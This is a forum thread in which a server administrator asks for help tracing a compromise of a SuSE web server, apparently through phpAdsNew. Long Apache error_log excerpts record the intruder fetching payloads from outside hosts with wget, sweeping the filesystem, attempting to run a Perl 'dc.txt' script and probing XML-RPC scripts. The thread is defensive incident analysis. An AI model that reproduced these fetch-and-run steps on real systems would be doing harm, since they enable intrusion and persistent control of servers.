LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 07-07-2006, 04:05 PM   #1
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Rep: Reputation: 15
tracking source of hacker


i recently had a box hacked and I believe phpAdsNew was the entry point. would anyone like to discuss how they determine this? my ad server was out of date true, but the hack corrupted my SuSe sserver as well and I'm having to do a new install of os, software etc.

i saw a bot it appears [209.190.222.186] in the log error files searching for any and all scripts, but especially phpadsnew, especially xmlrpc.php & adxmlrpc.php and other ones like phpBB, phpMyAdmin etc.

i also have an odd line in my log files I don't understand, but I saw this the last time my server acted sluggish, is this a DOS attack?

Code:
connect 194.109.153.2:6667 http:/1.0   pxyscand/2.1
 
Old 07-07-2006, 05:39 PM   #2
leonscape
Senior Member
 
Registered: Aug 2003
Location: UK
Distribution: Debian SID / KDE 3.5
Posts: 2,313

Rep: Reputation: 48
Doing a reverse DNS the domain name came back as engine07.atwcorp.com Looking at their website they are a software security company.

Maybe the hosting was doing a scan for vunerable software?

The other one in the log looks like the PXYS2 Proxy Scanner software at work, looking for an IRC Server.
 
Old 07-07-2006, 07:22 PM   #3
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
But I doubt he security company is actually doing the scanning, probably a funny joke by the scammer throwing you off his tracks by using an oddly enough trusted IP?

I found something odd in my error_log too:

Code:
[Sun Jun 11 04:20:56 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Sun Jun 11 08:18:48 2006] [notice] child pid 23195 exit signal Segmentation fault (11)
[Sun Jun 11 08:38:24 2006] [notice] child pid 23784 exit signal Segmentation fault (11)
[Sun Jun 11 08:54:28 2006] [notice] child pid 24119 exit signal Segmentation fault (11)
[Sun Jun 11 09:43:26 2006] [notice] child pid 25384 exit signal Segmentation fault (11)
[Sun Jun 11 10:09:00 2006] [notice] child pid 26275 exit signal Segmentation fault (11)
[Sun Jun 11 10:18:12 2006] [notice] child pid 26490 exit signal Segmentation fault (11)
[Sun Jun 11 11:04:20 2006] [notice] child pid 27764 exit signal Segmentation fault (11)
[Sun Jun 11 11:15:34 2006] [notice] child pid 28419 exit signal Segmentation fault (11)
[Sun Jun 11 12:03:29 2006] [notice] child pid 29624 exit signal Segmentation fault (11)
[Sun Jun 11 12:13:09 2006] [notice] child pid 30018 exit signal Segmentation fault (11)
[Sun Jun 11 18:18:37 2006] [notice] child pid 8381 exit signal Segmentation fault (11)
[Sun Jun 11 23:45:43 2006] [notice] child pid 22540 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb63a4014 ***
[Mon Jun 12 20:43:44 2006] [notice] child pid 407 exit signal Segmentation fault (11)
[Tue Jun 13 19:07:34 2006] [notice] child pid 18204 exit signal Segmentation fault (11)
Premature end of JPEG file
Premature end of JPEG file
*** glibc detected *** double free or corruption: 0xb754c014 ***
--18:01:14--  http://www.dulci.go.ro/bash
           => `bash'
Resolving www.dulci.go.ro... 81.196.20.134
Connecting to www.dulci.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,123 (11K) [text/plain]

    0K ..........                                            100%   50.49 KB/s

18:01:15 (50.49 KB/s) - `bash' saved [11123/11123]

sh: chmdo: command not found
sh: ./bash: Permission denied
sh: ./bash: Permission denied
sh: locate: command not found
--18:03:11--  http://www.chinez.xhost.ro/super.tar.gz
           => `super.tar.gz'
Resolving www.chinez.xhost.ro... 64.111.196.20
Connecting to www.chinez.xhost.ro|64.111.196.20|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: http://chinez.xhost.ro/super.tar.gz [following]
--18:03:11--  http://chinez.xhost.ro/super.tar.gz
           => `super.tar.gz'
Resolving chinez.xhost.ro... 64.111.196.20
Connecting to chinez.xhost.ro|64.111.196.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 254,365 (248K) [application/x-gzip]


    0K .......... .......... .......... .......... .......... 20%   32.63 KB/s
   50K .......... .......... .......... .......... .......... 40%   30.48 KB/s
  100K .......... .......... .......... .......... .......... 60%   29.76 KB/s
  150K .......... .......... .......... .......... .......... 80%   29.58 KB/s
  200K .......... .......... .......... .......... ........  100%   30.43 KB/s

18:03:20 (30.54 KB/s) - `super.tar.gz' saved [254365/254365]

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
sh: locate: command not found
*** glibc detected *** double free or corruption: 0x084d4bcc ***
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Thu Jun 15 14:46:57 2006] [notice] child pid 16922 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb633e014 ***
 
Old 07-07-2006, 10:49 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
The box definitely appears hacked. Could you post all of the relevent Apache logs?

The gd errors relating to corrupt jpeg images look like this unpatched vuln, though I'm unsure of how you'd exploit a webserver remotely with that.
 
Old 07-07-2006, 11:35 PM   #5
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
error_log (continued)
Code:
....
[Thu Jun 15 14:46:57 2006] [notice] child pid 16922 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb633e014 ***
*** glibc detected *** double free or corruption: 0x084637e4 ***
[Sat Jun 17 23:25:39 2006] [notice] child pid 26970 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x08572f24 ***
*** glibc detected *** double free or corruption: 0x084d43d4 ***
*** glibc detected *** double free or corruption: 0xb6307014 ***
*** glibc detected *** double free or corruption: 0xb63a5014 ***
[Sun Jun 18 17:27:59 2006] [notice] child pid 22168 exit signal Segmentation fault (11)
[Sun Jun 18 22:51:23 2006] [notice] child pid 3618 exit signal Segmentation fault (11)
[Mon Jun 19 03:02:36 2006] [notice] child pid 11077 exit signal Segmentation fault (11)
[Mon Jun 19 04:50:35 2006] [notice] child pid 13470 exit signal Segmentation fault (11)
--06:29:15--  http://www.geocities.com/adasadaa/x
           => `x'
Resolving www.geocities.com... 66.218.77.68
Connecting to www.geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 656 [application/octet-stream]

    0K                                                       100%   36.80 MB/s

06:29:15 (36.80 MB/s) - `x' saved [656/656]

*** glibc detected *** double free or corruption: 0xb63a4014 ***
*** glibc detected *** double free or corruption: 0xb6378014 ***
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 16:04:30 2006] [notice] child pid 19137 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 16:25:32 2006] [notice] child pid 20450 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Mon Jun 19 19:33:21 2006] [notice] child pid 28828 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Tue Jun 20 19:18:30 2006] [notice] child pid 31654 exit signal Segmentation fault (11)
[Tue Jun 20 22:18:18 2006] [notice] child pid 7983 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb630a014 ***
[Wed Jun 21 08:24:57 2006] [notice] child pid 26447 exit signal Segmentation fault (11)
[Wed Jun 21 14:26:32 2006] [notice] child pid 14253 exit signal Segmentation fault (11)
[Thu Jun 22 01:47:41 2006] [notice] child pid 11249 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x084636fc ***
*** glibc detected *** double free or corruption: 0xb6377014 ***
[Thu Jun 22 13:26:34 2006] [notice] child pid 32232 exit signal Segmentation fault (11)
[Thu Jun 22 15:09:27 2006] [notice] child pid 4887 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x0845e08c ***
*** glibc detected *** double free or corruption: 0xb62f5014 ***
[Fri Jun 23 10:16:05 2006] [notice] child pid 11797 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb63a5014 ***
[Fri Jun 23 19:11:37 2006] [notice] child pid 4416 exit signal Segmentation fault (11)
[Sat Jun 24 05:39:59 2006] [notice] child pid 22953 exit signal Segmentation fault (11)
[Sat Jun 24 06:41:53 2006] [notice] child pid 23945 exit signal Segmentation fault (11)
[Sat Jun 24 10:33:56 2006] [notice] child pid 29906 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62f1014 ***
*** glibc detected *** double free or corruption: 0x08538c2c ***
[Sat Jun 24 16:20:33 2006] [notice] child pid 10163 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62cc014 ***
[Sun Jun 25 08:54:07 2006] [notice] child pid 5515 exit signal Segmentation fault (11)
[Sun Jun 25 10:09:36 2006] [notice] child pid 7489 exit signal Segmentation fault (11)
Premature end of JPEG file
gd-jpeg: JPEG library reports unrecoverable error: JPEG datastream contains no image
[Sun Jun 25 23:28:49 2006] [notice] child pid 3936 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0x084805b4 ***
[Mon Jun 26 02:09:43 2006] [notice] child pid 9980 exit signal Segmentation fault (11)
[Mon Jun 26 11:09:40 2006] [notice] child pid 23837 exit signal Segmentation fault (11)
[Mon Jun 26 14:06:23 2006] [notice] child pid 32222 exit signal Segmentation fault (11)
[Mon Jun 26 17:11:13 2006] [notice] child pid 8716 exit signal Segmentation fault (11)
[Mon Jun 26 17:50:54 2006] [notice] child pid 10437 exit signal Segmentation fault (11)
find: /etc/ppp: Permission denied
find: /etc/ssl/private: Permission denied
find: /etc/cups/ssl: Permission denied
find: /etc/cups/certs: Permission denied
find: /etc/news: Permission denied
find: /etc/uucp: Permission denied
find: /etc/sysconfig/network/providers: Permission denied
find: /etc/webmin: Permission denied
find: /etc/autoinstall: Permission denied
find: /etc/apache2/ssl.key: Permission denied
find: /srv/ftp: Permission denied
find: /tmp/mcop-msusol: Permission denied
find: /tmp/3Ddiag.Tr7477: Permission denied
find: /tmp/3Ddiag.YS6564: Permission denied
find: /tmp/YaST2-03816-Gkzrfl: Permission denied
find: /tmp/YaST2-18962-nsuZQ7: Permission denied
find: /tmp/YaST2-05876-URBRa3: Permission denied
find: /tmp/3Ddiag.a16732: Permission denied
find: /tmp/mc-root: Permission denied
find: /tmp/YaST2.tdir: Permission denied
find: /tmp/3Ddiag.aV7120: Permission denied
find: /tmp/YaST2-10473-xEK0uq: Permission denied
find: /tmp/YaST2-10615-cBzCag: Permission denied
find: /tmp/suse_desktop_ErRc1U: Permission denied
find: /tmp/3Ddiag.fM9259: Permission denied
find: /tmp/YaST2-10897-PgjKmj: Permission denied
find: /tmp/YaST2-06848-Q744JJ: Permission denied
find: /tmp/YaST2-10517-jagiVP: Permission denied
find: /tmp/ksocket-root: Permission denied
find: /tmp/gconfd-root: Permission denied
find: /tmp/YaST2-17695-6BxE42: Permission denied
find: /tmp/YaST2-05266-m8nydR: Permission denied
find: /tmp/kde-root: Permission denied
find: /tmp/3Ddiag.nk6146: Permission denied
find: /tmp/3Ddiag.rK6073: Permission denied
find: /tmp/YaST2-06687-O34bdy: Permission denied
find: /tmp/gpg-dQtAEU: Permission denied
find: /tmp/3Ddiag.ou6715: Permission denied
find: /tmp/3Ddiag.rf6824: Permission denied
find: /tmp/3Ddiag.rs6255: Permission denied
find: /tmp/kde-msusol: Permission denied
find: /tmp/orbit-root: Permission denied
find: /tmp/orbit-msusol: Permission denied
find: /tmp/3Ddiag.yQ7863: Permission denied
find: /tmp/3Ddiag.wi7586: Permission denied
find: /tmp/YaST2-26946-Ndu3hJ: Permission denied
find: /tmp/ksocket-msusol: Permission denied
find: /tmp/YaST2-26873-kpFiIS: Permission denied
find: /tmp/gpg-uMdnPM: Permission denied
find: /tmp/YaST2-13833-RkMX69: Permission denied
find: /tmp/gconfd-msusol: Permission denied
find: /tmp/YaST2-10545-isvqm5: Permission denied
find: /tmp/sysconfig-update: Permission denied
find: /tmp/YaST2-17723-URzUyw: Permission denied
find: /tmp/YaST2-09285-kOS7gq: Permission denied
find: /tmp/mcop-root: Permission denied
find: /tmp/3Ddiag.N16841: Permission denied
find: /tmp/3Ddiag.Ji6182: Permission denied
find: /var/adm/backup: Permission denied
find: /var/adm/autoinstall: Permission denied
find: /var/lib/nfs/sm: Permission denied
find: /var/lib/nfs/sm.bak: Permission denied
find: /var/lib/xdm/authdir: Permission denied
find: /var/lib/acpi: Permission denied
find: /var/lib/pam_devperm: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/mysql/cacti: Permission denied
find: /var/lib/mysql/ultimateeventing_com_-_phpbb: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_phpcollab: Permission denied
find: /var/lib/mysql/ultimatedressage_com_-_class: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_crm: Permission denied
find: /var/lib/mysql/ultimatecreativemedia_com_-_sda: Permission denied
find: /var/lib/mysql/ultimatedressage_com_-_phpbb: Permission denied
find: /var/lib/samba/profiles: Permission denied
find: /var/lib/smpppd: Permission denied
find: /var/log/news: Permission denied
find: /var/log/YaST2: Permission denied
find: /var/log/smpppd: Permission denied
find: /var/log/apache2: Permission denied
find: /var/run/sudo: Permission denied
find: /var/run/agentx: Permission denied
find: /var/run/smpppd: Permission denied
find: /var/run/xdmctl/dmctl: Permission denied
find: /var/run/xdmctl/dmctl-:0: Permission denied
find: /var/run/pure-ftpd: Permission denied
find: /var/tmp/kdecache-msusol: Permission denied
find: /var/tmp/kdecache-root: Permission denied
find: /var/streaming: Permission denied
find: /var/spool/cron: Permission denied
find: /var/spool/cups: Permission denied
find: /var/spool/clientmqueue: Permission denied
find: /var/spool/atjobs: Permission denied
find: /var/spool/atspool: Permission denied
find: /var/spool/postfix/hold: Permission denied
find: /var/spool/postfix/corrupt: Permission denied
find: /var/spool/postfix/defer: Permission denied
find: /var/spool/postfix/flush: Permission denied
find: /var/spool/postfix/saved: Permission denied
find: /var/spool/postfix/trace: Permission denied
find: /var/spool/postfix/maildrop: Permission denied
find: /var/spool/postfix/active: Permission denied
find: /var/spool/postfix/bounce: Permission denied
find: /var/spool/postfix/deferred: Permission denied
find: /var/spool/postfix/public: Permission denied
find: /var/spool/postfix/incoming: Permission denied
find: /var/spool/postfix/private: Permission denied
find: /var/webmin: Permission denied
find: /usr/lib/man-db: Permission denied
find: /usr/share/YaST2/data/support: Permission denied
find: /home/msusol/.kde: Permission denied
find: /home/msusol/Mail: Permission denied
find: /home/msusol/Desktop: Permission denied
find: /proc/tty/driver: Permission denied
find: /proc/1/task/1/fd: Permission denied
find: /proc/2/task/2/fd: Permission denied
find: /proc/3/task/3/fd: Permission denied
find: /proc/4/task/4/fd: Permission denied
find: /proc/5/task/5/fd: Permission denied
find: /proc/6/task/6/fd: Permission denied
find: /proc/7/task/7/fd: Permission denied
find: /proc/8/task/8/fd: Permission denied
find: /proc/9/task/9/fd: Permission denied
find: /proc/10/task/10/fd: Permission denied
find: /proc/11/task/11/fd: Permission denied
find: /proc/12/task/12/fd: Permission denied
find: /proc/13/task/13/fd: Permission denied
find: /proc/14/task/14/fd: Permission denied
find: /proc/15/task/15/fd: Permission denied
find: /proc/16/task/16/fd: Permission denied
find: /proc/17/task/17/fd: Permission denied
find: /proc/18/task/18/fd: Permission denied
find: /proc/19/task/19/fd: Permission denied
find: /proc/43/task/43/fd: Permission denied
find: /proc/44/task/44/fd: Permission denied
find: /proc/45/task/45/fd: Permission denied
find: /proc/46/task/46/fd: Permission denied
find: /proc/56/task/56/fd: Permission denied
find: /proc/60/task/60/fd: Permission denied
find: /proc/59/task/59/fd: Permission denied
find: /proc/61/task/61/fd: Permission denied
find: /proc/62/task/62/fd: Permission denied
find: /proc/63/task/63/fd: Permission denied
find: /proc/646/task/646/fd: Permission denied
find: /proc/1412/task/1412/fd: Permission denied
find: /proc/1523/task/1523/fd: Permission denied
find: /proc/1524/task/1524/fd: Permission denied
find: /proc/1525/task/1525/fd: Permission denied
find: /proc/1526/task/1526/fd: Permission denied
find: /proc/2189/task/2189/fd: Permission denied
find: /proc/2243/task/2243/fd: Permission denied
find: /proc/2612/task/2612/fd: Permission denied
find: /proc/3317/task/3317/fd: Permission denied
find: /proc/3331/task/3331/fd: Permission denied
find: /proc/3332/task/3332/fd: Permission denied
find: /proc/3475/task/3475/fd: Permission denied
find: /proc/3728/task/3728/fd: Permission denied
find: /proc/3731/task/3731/fd: Permission denied
find: /proc/3774/task/3774/fd: Permission denied
find: /proc/3780/task/3780/fd: Permission denied
find: /proc/3895/task/3895/fd: Permission denied
find: /proc/3906/task/3906/fd: Permission denied
find: /proc/4010/task/4010/fd: Permission denied
find: /proc/4011/task/4011/fd: Permission denied
find: /proc/4061/task/4061/fd: Permission denied
find: /proc/4062/task/4062/fd: Permission denied
find: /proc/4296/task/4296/fd: Permission denied
find: /proc/4387/task/4387/fd: Permission denied
find: /proc/5014/task/5014/fd: Permission denied
find: /proc/5030/task/5030/fd: Permission denied
find: /proc/5060/task/5060/fd: Permission denied
find: /proc/5069/task/5069/fd: Permission denied
find: /proc/5087/task/5087/fd: Permission denied
find: /proc/5105/task/5105/fd: Permission denied
find: /proc/5171/task/5171/fd: Permission denied
find: /proc/5218/task/5218/fd: Permission denied
find: /proc/5221/task/5221/fd: Permission denied
find: /proc/5233/task/5233/fd: Permission denied
find: /proc/5992/task/5992/fd: Permission denied
find: /proc/5995/task/5995/fd: Permission denied
find: /proc/5997/task/5997/fd: Permission denied
find: /proc/5998/task/5998/fd: Permission denied
find: /proc/5999/task/5999/fd: Permission denied
find: /proc/6000/task/6000/fd: Permission denied
find: /proc/6001/task/6001/fd: Permission denied
find: /proc/6002/task/6002/fd: Permission denied
find: /proc/6005/task/6005/fd: Permission denied
find: /proc/6009/task/6009/fd: Permission denied
find: /proc/6020/task/6020/fd: Permission denied
find: /proc/6043/task/6043/fd: Permission denied
find: /proc/6066/task/6066/fd: Permission denied
find: /proc/6068/task/6068/fd: Permission denied
find: /proc/6069/task/6069/fd: Permission denied
find: /proc/6073/task/6073/fd: Permission denied
find: /proc/6074/task/6074/fd: Permission denied
find: /proc/6078/task/6078/fd: Permission denied
find: /proc/6079/task/6079/fd: Permission denied
find: /proc/6097/task/6097/fd: Permission denied
find: /proc/6099/task/6099/fd: Permission denied
find: /proc/6101/task/6101/fd: Permission denied
find: /proc/6104/task/6104/fd: Permission denied
find: /proc/6105/task/6105/fd: Permission denied
find: /proc/6109/task/6109/fd: Permission denied
find: /proc/6114/task/6114/fd: Permission denied
find: /proc/6297/task/6297/fd: Permission denied
find: /proc/6298/task/6298/fd: Permission denied
find: /proc/21271/task/21271/fd: Permission denied
find: /proc/20209/task/20209/fd: Permission denied
find: /proc/29825/task/29825/fd: Permission denied
find: /proc/30955/task/30955/fd: Permission denied
find: /proc/31130/task/31130/fd: Permission denied
find: /proc/32367/task/32367/fd: Permission denied
find: /proc/3069/task/3069/fd: Permission denied
find: /proc/30494/task/30494/fd: Permission denied
find: /proc/8739/task/8739/fd: Permission denied
find: /proc/22723/task/22723/fd: Permission denied
find: /proc/26048/task/26048/fd: Permission denied
find: /proc/32504/task/32504/fd: Permission denied
find: /proc/31700/task/31700/fd: Permission denied
find: /proc/13389/task/13389/fd: Permission denied
find: /proc/6977/task/6977/fd: Permission denied
find: /proc/916/task/916/fd: Permission denied
find: /proc/12460/task/12460/fd: Permission denied
find: /proc/32481/task/32481/fd: Permission denied
find: /proc/12194/task/12194/fd: Permission denied
find: /proc/30594/task/30594/fd: Permission denied
find: /proc/15750/task/15750/fd: Permission denied
find: /proc/16762/task/16762/fd: Permission denied
find: /proc/17215/task/17215/fd: Permission denied
find: /proc/17299/task/17299/fd: Permission denied
find: /proc/17407/task/17407/fd: Permission denied
find: /proc/17463/task/17463/fd: Permission denied
find: /proc/17489/task/17489/fd: Permission denied
find: /proc/17521/task/17521/fd: Permission denied
find: /proc/17663/task/17663/fd: Permission denied
find: /proc/17664/task/17664/fd: Permission denied
find: /proc/17675/task/17675/fd: Permission denied
find: /proc/17680/task/17680/fd: Permission denied
find: /proc/17695/task/17695/fd: Permission denied
find: /proc/17699/task/17699/fd: Permission denied
find: /proc/17702/task/17702/fd: Permission denied
find: /proc/17705/task/17705/fd: Permission denied
find: /proc/17709/task/17709/fd: Permission denied
find: /proc/17713/task/17713/fd: Permission denied
find: /proc/17716/task/17716/fd: Permission denied
find: /proc/17742/task/17742/fd: Permission denied
find: /proc/17744/task/17744/fd: Permission denied
find: /proc/17747/task/17747/fd: Permission denied
find: /proc/17751/task/17751/fd: Permission denied
find: /proc/17752/task/17752/fd: Permission denied
find: /proc/17759/task/17759/fd/19: No such file or directory
find: /proc/17762/task/17762/fd: Permission denied
find: /proc/17763/task/17763/fd: Permission denied
find: /proc/17768/task/17768/fd: Permission denied
find: /proc/17771/task/17771/fd: Permission denied
find: /proc/17772/task/17772/fd: Permission denied
find: /proc/17773/task/17773/fd: Permission denied
find: /proc/17779/task/17779/fd: Permission denied
find: /proc/17780/task/17780/fd: Permission denied
find: /proc/17782/task/17782/fd: Permission denied
find: /proc/17792/task/17792/fd: Permission denied
find: /proc/17793/task/17793/fd: Permission denied
find: /proc/17797/task/17797/fd: Permission denied
find: /proc/17798/task/17798/fd: Permission denied
find: /proc/17803/task/17803/fd: Permission denied
find: /proc/17804/task/17804/fd: Permission denied
find: /proc/17805/task/17805/fd: Permission denied
find: /proc/17806/task/17806/fd: Permission denied
find: /proc/17807/task/17807/fd: Permission denied
find: /proc/17808/task/17808/fd: Permission denied
find: /proc/17809/task/17809/fd: Permission denied
find: /proc/17810/task/17810/fd: Permission denied
find: /proc/17811/task/17811/fd: Permission denied
find: /proc/17812/task/17812/fd: Permission denied
find: /proc/17813/task/17813/fd: Permission denied
find: /proc/17814/task/17814/fd: Permission denied
find: /proc/17815/task/17815/fd: Permission denied
find: /proc/17816/task/17816/fd: Permission denied
find: /proc/17817/task/17817/fd: Permission denied
find: /proc/17818/task/17818/fd: Permission denied
find: /proc/17819/task/17819/fd: Permission denied
find: /proc/17820/task/17820/fd: Permission denied
find: /proc/17821/task/17821/fd: Permission denied
find: /root: Permission denied
find: /media/cdrom: No medium found
find: /media/floppy: No medium found
find: /backups/hotbackup/ultimatedressage_com_-_class_old: Permission denied
find: /backups/hotbackup/ultimatedressage_com_-_phpbb_old: Permission denied
find: /backups/hotbackup/cacti_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_crm_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_sda_old: Permission denied
find: /backups/hotbackup/ultimatecreativemedia_com_-_phpcollab_old: Permission denied
find: /backups/hotbackup/mysql_old: Permission denied
find: /backups/hotbackup/ultimateeventing_com_-_phpbb_old: Permission denied
Unable to Connect
mv: cannot move `adxmlrpc.php' to `a.php': Permission denied
[Wed Jun 28 18:23:02 2006] [notice] child pid 30105 exit signal Segmentation fault (11)
[Wed Jun 28 20:00:44 2006] [notice] child pid 1583 exit signal Segmentation fault (11)
[Thu Jun 29 02:54:40 2006] [notice] child pid 16979 exit signal Segmentation fault (11)
[Thu Jun 29 17:26:26 2006] [notice] child pid 23048 exit signal Segmentation fault (11)
[Thu Jun 29 23:05:26 2006] [notice] child pid 3458 exit signal Segmentation fault (11)
dig: '.virginiasporthorses.com' is not a legal name (empty label)
ping: unknown host .virginiasporthorses.com
.virginiasporthorses.com: Name or service not known
[Fri Jun 30 04:37:44 2006] [notice] child pid 12665 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb6373014 ***
[Sat Jul 01 02:32:55 2006] [notice] child pid 30312 exit signal Segmentation fault (11)
[Sat Jul 01 02:47:54 2006] [notice] child pid 30757 exit signal Segmentation fault (11)
*** glibc detected *** double free or corruption: 0xb62c5014 ***
*** glibc detected *** double free or corruption: 0x084b04dc ***
[Sat Jul 01 13:00:02 2006] [notice] SIGHUP received.  Attempting to restart
[Sat Jul 01 13:00:05 2006] [warn] NameVirtualHost *:0 has no VirtualHosts
[Sat Jul 01 13:00:07 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
sh: locate: command not found
sh: line 0: cd: /tmp: No such file or directory
Can't open perl script "dc.txt": No such file or directory.
Use -S to search $PATH for it.
[Sat Jul 01 17:40:36 2006] [notice] child pid 5606 exit signal Segmentation fault (11)
[Sat Jul 01 21:00:20 2006] [notice] child pid 12440 exit signal Segmentation fault (11)
sh: line 0: cd: /tmp: No such file or directory
--21:38:52--  http://www.dulci.go.ro/bash
           => `bash'
Resolving www.dulci.go.ro... 81.196.20.134
Connecting to www.dulci.go.ro|81.196.20.134|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,123 (11K) [text/plain]
bash: Permission denied

Cannot write to `bash' (Permission denied).
chmod: cannot access `bash': No such file or directory
sh: ./bash: No such file or directory
*** glibc detected *** double free or corruption: 0xb62ed014 ***
[Mon Jul 03 00:23:20 2006] [notice] child pid 25522 exit signal Segmentation fault (11)
[Sun Jul 02 23:09:44 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sun Jul 02 23:09:44 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sun Jul 02 23:09:46 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sun Jul 02 23:09:46 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Sun Jul 02 23:24:06 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sun Jul 02 23:24:06 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sun Jul 02 23:24:09 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Sun Jul 02 23:24:09 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Mon Jul 03 01:17:01 2006] [notice] caught SIGTERM, shutting down
[Wed Jul 05 21:22:11 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 21:22:11 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 21:22:13 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 21:30:35 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 21:30:35 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 21:30:37 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 21:30:37 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 22:32:32 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 22:32:32 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 22:32:35 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 22:32:35 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 23:00:15 2006] [notice] caught SIGTERM, shutting down
[Wed Jul 05 23:03:51 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 23:03:51 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 23:03:53 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
[Wed Jul 05 23:43:29 2006] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Wed Jul 05 23:43:29 2006] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Wed Jul 05 23:43:33 2006] [warn] pid file /var/run/httpd2.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed Jul 05 23:43:33 2006] [notice] Apache/2.0.50 (Linux/SUSE) configured -- resuming normal operations
 
Old 07-07-2006, 11:48 PM   #6
Boss Hoss
Member
 
Registered: Sep 2003
Distribution: SuSe
Posts: 62

Original Poster
Rep: Reputation: 15
we know something really happened on Jul 1 16:51 because a new user was added to the server verified by checking the last date stamp on /etc/passwd

other oddities:
Code:
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/a1b2c3d4e5f6g7h8i9
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] script '/srv/www/vhosts/susebox/html/adxmlrpc.php' not found or unable to stat
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/adserver
[Sat Jul 01 13:17:27 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpAdsNew
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpadsnew
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/phpads
[Sat Jul 01 13:17:28 2006] [error] [client 66.221.68.185] File does not exist: /srv/www/vhosts/susebox/html/Ads
